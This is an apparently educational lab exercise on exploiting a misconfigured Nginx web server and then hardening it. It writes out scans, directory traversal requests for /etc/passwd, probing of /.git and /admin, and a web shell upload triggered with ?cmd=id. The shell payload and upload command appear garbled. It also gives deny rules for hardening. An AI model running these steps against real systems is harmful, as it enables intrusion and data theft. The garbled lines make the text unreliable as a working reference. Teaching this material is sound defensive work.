Exercise 31: Exploiting Misconfigured Nginx Web Server

Objective: Exploit misconfigurations in the Nginx web server to gain unauthorized access to sensitive data or escalate privileges, and learn how to secure Nginx configurations.

---

Scenario: Nginx is a popular web server used for serving websites and applications. Misconfigurations, such as directory traversal vulnerabilities or exposed sensitive files, can lead to unauthorized access or privilege escalation. Your task is to identify and exploit such vulnerabilities and secure the Nginx server.

---

Lab Setup

1. Environment:
   • A Linux system running an Nginx web server with intentional misconfigurations.
2. Tools Required:
   • nmap for scanning.
   • Nikto or a web browser for vulnerability enumeration.

---

Lab Steps

Step 1: Scan for Open Nginx Services

1. Use nmap to identify open ports and services: nmap -p 80,443 --script=http-enum,http-vhosts <target_ip>
   • Replace <target_ip> with the IP address of the target system.
   • Example output: PORT STATE SERVICE 80/tcp open http 443/tcp open https
2. Use Nikto to enumerate web server vulnerabilities: nikto -h http://<target_ip>
   • Look for exposed directories, configuration files, or vulnerabilities.

Step 2: Test for Directory Traversal

1. Attempt to access sensitive files using directory traversal techniques: http://<target_ip>/../../etc/passwd
   • Replace <target_ip> with the target’s IP address.
2. Use tools like curl to automate the process: curl http://<target_ip>/../../etc/passwd
   • Verify if sensitive file content (e.g., /etc/passwd) is exposed.

Step 3: Enumerate and Exploit Misconfigurations

1. Identify accessible directories or files:
   • Common locations to check: http://<target_ip>/backup http://<target_ip>/admin http://<target_ip>/.git
2. Exploit weakly configured root paths:
   • Look for symbolic links or misconfigured root or alias directives in the Nginx configuration.
   • Example misconfiguration in nginx.conf: location /static/ { alias /var/www/html/uploads/; }
   • Use this to access unintended files.
3. If file upload is enabled, attempt to upload a malicious script: echo '<?php ?>' > shell.php curl -X POST -F '[email protected]' http://<target_ip>/upload
4. Trigger the uploaded file: http://<target_ip>/uploads/shell.php?cmd=id

Step 4: Secure the Nginx Configuration

1. Restrict access to sensitive directories in the Nginx configuration file (/etc/nginx/nginx.conf): location ~ /(\.|\..|backup|admin) { deny all; }
2. Set proper file permissions: chmod -R 750 /var/www/html chown -R www-data:www-data /var/www/html
3. Disable directory listing: location / { autoindex off; }
4. Prevent access to sensitive files: location ~* \.(htaccess|htpasswd|config) { deny all; }
5. Restart the Nginx service to apply changes: sudo systemctl restart nginx

---

Testing and Verification

1. Re-test for directory traversal vulnerabilities after applying mitigations.
2. Verify that sensitive files and directories are no longer accessible.
3. Ensure that unauthorized file uploads are blocked.

---

Reflection

This exercise demonstrates how misconfigurations in the Nginx web server can lead to unauthorized access or privilege escalation. By identifying and mitigating these vulnerabilities, you’ve gained valuable insights into securing web servers and their configurations.